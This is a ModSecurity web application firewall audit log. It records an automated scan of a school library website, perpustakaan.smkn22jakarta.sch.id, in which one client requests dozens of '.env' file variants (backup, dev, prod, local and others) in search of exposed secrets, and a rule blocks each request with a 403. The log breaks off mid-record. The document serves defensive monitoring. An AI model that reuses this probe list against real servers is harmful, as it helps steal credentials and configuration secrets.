OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be2e5b49-Z-- --48a45a0d-A-- [04/Jun/2025:06:13:38 +0700] aD-BopLmnxTwEPX7IubOvQAAAJM 103.236.140.4 43926 103.236.140.4 8181 --48a45a0d-B-- GET /.env.backup.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521301 --48a45a0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --48a45a0d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992418121301 901 (- - -) Stopwatch2: 1748992418121301 901; combined=407, p1=368, p2=0, p3=0, p4=0, p5=39, sr=168, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48a45a0d-Z-- --d8be0e52-A-- [04/Jun/2025:06:13:38 +0700] aD-BothPZJx8OfNaLCowlQAAAMw 103.236.140.4 43930 103.236.140.4 8181 --d8be0e52-B-- GET /.env.bak.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603430 --d8be0e52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d8be0e52-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992418849436 775 (- - -) Stopwatch2: 1748992418849436 775; combined=352, p1=316, p2=0, p3=0, p4=0, p5=36, sr=146, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8be0e52-Z-- --e35eab39-A-- [04/Jun/2025:06:13:40 +0700] aD-BpDNXNn6zAsHj7JAXJwAAAFM 103.236.140.4 43934 103.236.140.4 8181 --e35eab39-B-- GET /.env.conf.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603433 --e35eab39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e35eab39-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992420177202 681 (- - -) Stopwatch2: 1748992420177202 681; combined=324, p1=287, p2=0, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e35eab39-Z-- --f9148110-A-- [04/Jun/2025:06:13:42 +0700] aD-BpjNXNn6zAsHj7JAXKAAAAFE 103.236.140.4 43940 103.236.140.4 8181 --f9148110-B-- GET /.env.config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521307 --f9148110-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f9148110-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992422804365 696 (- - -) Stopwatch2: 1748992422804365 696; combined=244, p1=204, p2=0, p3=0, p4=0, p5=40, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9148110-Z-- --1a13656e-A-- [04/Jun/2025:06:13:48 +0700] aD-BrJLmnxTwEPX7IubOvwAAAJc 103.236.140.4 43948 103.236.140.4 8181 --1a13656e-B-- GET /.env.defaults.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521310 --1a13656e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1a13656e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992428992851 961 (- - -) Stopwatch2: 1748992428992851 961; combined=418, p1=384, p2=0, p3=0, p4=0, p5=34, sr=169, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a13656e-Z-- --219e1239-A-- [04/Jun/2025:06:13:53 +0700] aD-BsV_DvM40jZomokt-GAAAAA4 103.236.140.4 43952 103.236.140.4 8181 --219e1239-B-- GET /.env.dev.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521313 --219e1239-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --219e1239-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992433561562 681 (- - -) Stopwatch2: 1748992433561562 681; combined=265, p1=228, p2=0, p3=0, p4=0, p5=37, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --219e1239-Z-- --8ad11e36-A-- [04/Jun/2025:06:13:55 +0700] aD-Bs5LmnxTwEPX7IubOwAAAAIA 103.236.140.4 43956 103.236.140.4 8181 --8ad11e36-B-- GET /.env.development.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603439 --8ad11e36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8ad11e36-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992435080185 847 (- - -) Stopwatch2: 1748992435080185 847; combined=328, p1=285, p2=0, p3=0, p4=0, p5=43, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ad11e36-Z-- --69b3ee50-A-- [04/Jun/2025:06:13:59 +0700] aD-Bt5LmnxTwEPX7IubOwQAAAIM 103.236.140.4 43960 103.236.140.4 8181 --69b3ee50-B-- GET /.env.example.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603442 --69b3ee50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --69b3ee50-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992439503142 839 (- - -) Stopwatch2: 1748992439503142 839; combined=337, p1=296, p2=0, p3=0, p4=0, p5=41, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69b3ee50-Z-- --41ab7b73-A-- [04/Jun/2025:06:14:00 +0700] aD-BuDNXNn6zAsHj7JAXKQAAAFU 103.236.140.4 43964 103.236.140.4 8181 --41ab7b73-B-- GET /.env.inc.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521316 --41ab7b73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --41ab7b73-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992440348590 665 (- - -) Stopwatch2: 1748992440348590 665; combined=260, p1=225, p2=0, p3=0, p4=0, p5=35, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41ab7b73-Z-- --99b6df53-A-- [04/Jun/2025:06:14:03 +0700] aD-Bu5LmnxTwEPX7IubOwgAAAIQ 103.236.140.4 43968 103.236.140.4 8181 --99b6df53-B-- GET /.env.local.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603445 --99b6df53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --99b6df53-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992443236185 840 (- - -) Stopwatch2: 1748992443236185 840; combined=335, p1=293, p2=0, p3=0, p4=0, p5=42, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99b6df53-Z-- --0e405261-A-- [04/Jun/2025:06:14:04 +0700] aD-BvF_DvM40jZomokt-GQAAABI 103.236.140.4 43972 103.236.140.4 8181 --0e405261-B-- GET /.env.old.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521319 --0e405261-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0e405261-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992444881561 817 (- - -) Stopwatch2: 1748992444881561 817; combined=328, p1=290, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e405261-Z-- --e046d905-A-- [04/Jun/2025:06:14:16 +0700] aD-ByNhPZJx8OfNaLCowlgAAAM4 103.236.140.4 43976 103.236.140.4 8181 --e046d905-B-- GET /.env.orig.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603448 --e046d905-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e046d905-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992456742934 936 (- - -) Stopwatch2: 1748992456742934 936; combined=399, p1=357, p2=0, p3=0, p4=0, p5=42, sr=142, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e046d905-Z-- --3f8eb336-A-- [04/Jun/2025:06:14:19 +0700] aD-By1_DvM40jZomokt-GgAAABE 103.236.140.4 43980 103.236.140.4 8181 --3f8eb336-B-- GET /.env.original.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603451 --3f8eb336-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3f8eb336-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992459883476 867 (- - -) Stopwatch2: 1748992459883476 867; combined=383, p1=345, p2=0, p3=0, p4=0, p5=38, sr=146, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f8eb336-Z-- --d5b58f06-A-- [04/Jun/2025:06:14:27 +0700] aD-B01_DvM40jZomokt-GwAAABY 103.236.140.4 43984 103.236.140.4 8181 --d5b58f06-B-- GET /.env.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521322 --d5b58f06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d5b58f06-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992467040914 689 (- - -) Stopwatch2: 1748992467040914 689; combined=261, p1=227, p2=0, p3=0, p4=0, p5=34, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5b58f06-Z-- --d197c355-A-- [04/Jun/2025:06:14:28 +0700] aD-B1NhPZJx8OfNaLCowlwAAANE 103.236.140.4 43988 103.236.140.4 8181 --d197c355-B-- GET /.env.php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603454 --d197c355-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d197c355-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992468282449 644 (- - -) Stopwatch2: 1748992468282449 644; combined=254, p1=220, p2=0, p3=0, p4=0, p5=33, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d197c355-Z-- --6bb05b3a-A-- [04/Jun/2025:06:14:28 +0700] aD-B1F_DvM40jZomokt-HAAAABU 103.236.140.4 43992 103.236.140.4 8181 --6bb05b3a-B-- GET /.env.php.dist HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521325 --6bb05b3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6bb05b3a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992468963842 690 (- - -) Stopwatch2: 1748992468963842 690; combined=293, p1=245, p2=0, p3=0, p4=0, p5=48, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6bb05b3a-Z-- --af4acc75-A-- [04/Jun/2025:06:14:33 +0700] aD-B2dhPZJx8OfNaLCowmQAAANM 103.236.140.4 43996 103.236.140.4 8181 --af4acc75-B-- GET /.env.php.swm HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521328 --af4acc75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --af4acc75-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992473734872 770 (- - -) Stopwatch2: 1748992473734872 770; combined=386, p1=348, p2=0, p3=0, p4=0, p5=37, sr=148, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af4acc75-Z-- --ac807b39-A-- [04/Jun/2025:06:14:37 +0700] aD-B3ZLmnxTwEPX7IubOwwAAAIY 103.236.140.4 44002 103.236.140.4 8181 --ac807b39-B-- GET /.env.prod.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521331 --ac807b39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ac807b39-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992477625960 739 (- - -) Stopwatch2: 1748992477625960 739; combined=302, p1=268, p2=0, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac807b39-Z-- --883e2c46-A-- [04/Jun/2025:06:14:38 +0700] aD-B3pLmnxTwEPX7IubOxAAAAIk 103.236.140.4 44006 103.236.140.4 8181 --883e2c46-B-- GET /.env.production.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 